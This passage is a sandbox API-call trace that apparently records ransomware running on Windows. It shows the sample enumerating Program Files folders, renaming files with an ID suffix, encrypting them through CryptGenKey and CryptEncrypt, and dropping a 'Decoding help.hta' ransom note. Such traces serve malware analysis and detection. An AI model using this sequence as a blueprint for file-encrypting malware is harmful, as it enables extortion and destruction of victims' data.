help.hta", lpString2="sbdrop.dll") returned -1 [0039.971] lstrlenW (lpString="sbdrop.dll") returned 10 [0039.971] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0039.971] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0039.971] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="sbdrop.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll" [0039.971] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll" [0039.971] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll" (normalized: "c:\\program files (x86)\\windows sidebar\\sbdrop.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\sbdrop.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.983] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81351db4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c393c21, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c393c21, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.ini", cAlternateFileName="")) returned 1 [0039.983] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0039.983] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0039.983] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta" [0039.983] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\decoding help.hta")) returned 0x1 [0039.983] lstrcmpiW (lpString1="Decoding help.hta", lpString2="settings.ini") returned -1 [0039.984] lstrlenW (lpString="settings.ini") returned 12 [0039.984] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0039.984] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0039.984] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="settings.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini" [0039.984] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini" [0039.984] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0039.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini" (normalized: "c:\\program files (x86)\\windows sidebar\\settings.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\settings.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\settings.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0039.991] CreateFileMappingA (hFile=0x184, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1e8 [0039.991] CryptAcquireContextA (in: phProv=0xab4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xab4fcec*=0x10a6cec8) returned 1 [0039.991] CryptGenKey (in: hProv=0x10a6cec8, Algid=0x6610, dwFlags=0x1, phKey=0xab4fce8 | out: phKey=0xab4fce8*=0x5a56f0) returned 1 [0039.991] CryptExportKey (in: hKey=0x5a56f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xab4fbe4, pdwDataLen=0xab4fce4 | out: pbData=0xab4fbe4*, pdwDataLen=0xab4fce4*=0x2c) returned 1 [0039.991] MapViewOfFile (hFileMappingObject=0x1e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x40) returned 0x2d0000 [0039.998] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xab4fbe4*, pdwDataLen=0xab4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xab4fbe4*, pdwDataLen=0xab4fcf8*=0x100) returned 1 [0039.998] CryptEncrypt (in: hKey=0x5a56f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xab4fce4*=0x40, dwBufLen=0x40 | out: pbData=0x2d0000*, pdwDataLen=0xab4fce4*=0x40) returned 1 [0039.998] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0039.999] CloseHandle (hObject=0x1e8) returned 1 [0039.999] CryptDestroyKey (hKey=0x5a56f0) returned 1 [0039.999] CryptReleaseContext (hProv=0x10a6cec8, dwFlags=0x0) returned 1 [0039.999] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.999] WriteFile (in: hFile=0x184, lpBuffer=0xab4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xab4fcf8, lpOverlapped=0x0 | out: lpBuffer=0xab4fbe4*, lpNumberOfBytesWritten=0xab4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.000] WriteFile (in: hFile=0x184, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xab4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xab4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.000] CloseHandle (hObject=0x184) returned 1 [0040.001] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.001] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shared Gadgets", cAlternateFileName="SHARED~1")) returned 1 [0040.001] lstrcmpW (lpString1=".", lpString2="Shared Gadgets") returned -1 [0040.001] lstrcmpW (lpString1="..", lpString2="Shared Gadgets") returned -1 [0040.001] lstrcmpiW (lpString1="windows", lpString2="Shared Gadgets") returned 1 [0040.003] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0040.003] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0040.003] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="Shared Gadgets" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets" [0040.003] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\*.*" [0040.003] GlobalMemoryStatus (in: lpBuffer=0xab4fd10 | out: lpBuffer=0xab4fd10) [0040.003] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a6cec8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x184 [0040.008] CloseHandle (hObject=0x184) returned 1 [0040.008] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e26afc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e26afc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3e4cc5c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11ea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sidebar.exe", cAlternateFileName="")) returned 1 [0040.008] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0040.008] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0040.008] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta" [0040.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\decoding help.hta")) returned 0x1 [0040.009] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sidebar.exe") returned -1 [0040.009] lstrlenW (lpString="sidebar.exe") returned 11 [0040.009] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0040.009] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0040.009] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="sidebar.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe" [0040.009] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe" [0040.009] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0040.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\sidebar.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\sidebar.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.013] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b27b844, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x4b27b844, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1525cf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wlsrvc.dll", cAlternateFileName="")) returned 1 [0040.013] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0040.013] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0040.013] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta" [0040.013] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\decoding help.hta")) returned 0x1 [0040.013] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wlsrvc.dll") returned -1 [0040.014] lstrlenW (lpString="wlsrvc.dll") returned 10 [0040.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0040.014] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned 46 [0040.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\", lpString2="wlsrvc.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll" [0040.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll" [0040.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0040.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll" (normalized: "c:\\program files (x86)\\windows sidebar\\wlsrvc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\wlsrvc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.014] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b27b844, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x4b27b844, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1525cf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wlsrvc.dll", cAlternateFileName="")) returned 0 [0040.014] FindClose (in: hFindFile=0x5a55b0 | out: hFindFile=0x5a55b0) returned 1 Thread: id = 109 os_tid = 0xbec [0040.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*", lpFindFileData=0x320fd30 | out: lpFindFileData=0x320fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5730 [0040.104] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.104] FindNextFileW (in: hFindFile=0x5a5730, lpFindFileData=0x320fd30 | out: lpFindFileData=0x320fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.104] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.104] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.105] FindNextFileW (in: hFindFile=0x5a5730, lpFindFileData=0x320fd30 | out: lpFindFileData=0x320fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0040.105] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*" [0040.105] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*") returned 46 [0040.105] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\Decoding help.hta" [0040.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\Decoding help.hta" (normalized: "c:\\program files\\common files\\designer\\decoding help.hta")) returned 0xffffffff [0040.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\Decoding help.hta" (normalized: "c:\\program files\\common files\\designer\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0040.105] WriteFile (in: hFile=0x224, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x320fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x320fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.106] CloseHandle (hObject=0x224) returned 1 [0040.106] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0040.106] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSADDNDR.DLL") returned -1 [0040.106] lstrlenW (lpString="MSADDNDR.DLL") returned 12 [0040.106] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*" [0040.106] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*.*") returned 46 [0040.107] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\", lpString2="MSADDNDR.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" [0040.107] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" [0040.107] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0040.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0041.383] CreateFileMappingA (hFile=0x2fc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x368 [0041.383] CryptAcquireContextA (in: phProv=0x320fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x320fcec*=0x3449ac8) returned 1 [0043.841] CryptGenKey (in: hProv=0x3449ac8, Algid=0x6610, dwFlags=0x1, phKey=0x320fce8 | out: phKey=0x320fce8*=0x5d8490) returned 1 [0043.841] CryptExportKey (in: hKey=0x5d8490, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x320fbe4, pdwDataLen=0x320fce4 | out: pbData=0x320fbe4*, pdwDataLen=0x320fce4*=0x2c) returned 1 [0043.841] MapViewOfFile (hFileMappingObject=0x368, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18340) returned 0x3960000 [0044.190] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320fbe4*, pdwDataLen=0x320fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x320fbe4*, pdwDataLen=0x320fcf8*=0x100) returned 1 [0047.292] CryptEncrypt (in: hKey=0x5d8490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3960000, pdwDataLen=0x320fce4*=0x18340, dwBufLen=0x18340 | out: pbData=0x3960000*, pdwDataLen=0x320fce4*=0x18340) returned 1 [0047.310] UnmapViewOfFile (lpBaseAddress=0x3960000) returned 1 [0047.313] CloseHandle (hObject=0x368) returned 1 [0047.313] CryptDestroyKey (hKey=0x5d8490) returned 1 [0047.313] CryptReleaseContext (hProv=0x3449ac8, dwFlags=0x0) returned 1 [0047.313] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.313] WriteFile (in: hFile=0x2fc, lpBuffer=0x320fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x320fcf8, lpOverlapped=0x0 | out: lpBuffer=0x320fbe4*, lpNumberOfBytesWritten=0x320fcf8*=0x100, lpOverlapped=0x0) returned 1 [0049.452] WriteFile (in: hFile=0x2fc, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x320fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x320fcf8*=0x500, lpOverlapped=0x0) returned 1 [0049.452] CloseHandle (hObject=0x2fc) returned 1 [0050.403] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.658] FindNextFileW (in: hFindFile=0x5a5730, lpFindFileData=0x320fd30 | out: lpFindFileData=0x320fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 0 [0053.658] FindClose (in: hFindFile=0x5a5730 | out: hFindFile=0x5a5730) returned 1 Thread: id = 110 os_tid = 0xbf0 [0040.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x2c0fd30 | out: 